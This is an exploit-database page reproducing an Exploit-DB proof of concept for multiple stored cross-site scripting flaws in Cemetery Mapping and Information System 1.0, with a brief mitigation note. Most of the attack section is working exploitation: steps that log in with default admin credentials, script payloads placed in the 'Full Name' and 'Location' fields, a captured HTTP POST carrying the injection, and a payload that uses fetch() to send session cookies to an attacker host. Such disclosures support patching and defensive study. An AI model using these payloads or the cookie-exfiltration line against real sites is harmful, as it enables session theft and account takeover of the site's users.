header-logo
Suggest Exploit
vendor:
Cemetry Mapping and Information System
by:
Mesut Cetin
7.5
CVSS
HIGH
Stored Cross-Site Scripting
79
CWE
Product Name: Cemetry Mapping and Information System
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0, Burp Suite Professional v.1.7.34
2021

Cemetry Mapping and Information System 1.0 – Multiple Stored Cross-Site Scripting

The Cemetry Mapping and Information System 1.0 is affected by multiple stored cross-site scripting vulnerabilities. The vulnerabilities allow an attacker to inject malicious scripts into the 'Full Name' and 'Location' parameters, potentially leading to the execution of arbitrary code or the theft of sensitive information.

Mitigation:

To mitigate these vulnerabilities, it is recommended to properly validate and sanitize user input before displaying it on webpages. Implementing input validation and output encoding can help prevent the execution of malicious scripts.
Source

Exploit-DB raw data:

# Exploit Title: Cemetry Mapping and Information System 1.0 - Multiple Stored Cross-Site Scripting
# Exploit Author: Mesut Cetin
# Date: 2021-01-10
# Vendor Homepage: https://www.sourcecodester.com/php/12779/cemetery-mapping-and-information-system-using-phpmysqli.html
# Software Link: https://www.sourcecodester.com/download-code?nid=12779&title=Cemetery+Mapping+and+Information+System+Using+PHP%2FMySQLi+with+Source+Code
# Affected Version: 1.0
# Tested on: Kali Linux 2020.4, PHP 7.4.13, mysqlnd 7.4.13, Apache/2.4.46 (Unix), OpenSSL/1.1.1h, mod_perl/2.0.11 Perl/v5.32.0, Burp Suite Professional v.1.7.34 

Affected parameter: "full name", "location"

Proof of concept:

1. Login under admin panel, http://localhost/CemeteryMapping/admin/login.php, with default credentials janobe:admin
2. Click on "Deceased Persons"
3. Choose one of the users and click on their names to edit it
4. In the field "Full Name" insert the payload: <script>alert(document.cookie)</script>
5. Save and open the webpage under http://localhost/CemeteryMapping/index.php?q=person
6. You will receive the PHPSESSID cookie as alert. The cookie values can be redirected to attacker page by using payloads like <script src="data:application/javascript,fetch(`https://attacker-page.com/${document.cookie}`)"></script>

To manipulate the "location" parameter, we will use Burp Suite. Capture the request with Burp:

POST /CemeteryMapping/admin/person/controller.php?action=edit HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 149
Origin: http://localhost
Connection: close
Referer: http://localhost/CemeteryMapping/admin/person/index.php?view=edit&id=1
Cookie: PHPSESSID=h9smkdr8dvjhsjviugnvot261m
Upgrade-Insecure-Requests: 1

PEOPLEID=1&GRAVENO=1&FNAME=JACONDIA+A.MORTEL&CATEGORIES=C&BORNDATE=07%2F04%2F1992&DIEDDATE=12%2F29%2F2003&LOCATION=BUENAVISTA+LOOC+CEMETERY<script>alert(document.cookie)</script>&save=

And forward the request. The cookie values will be displayed on screen.

Navigation

Suggest Exploit

Services By CQR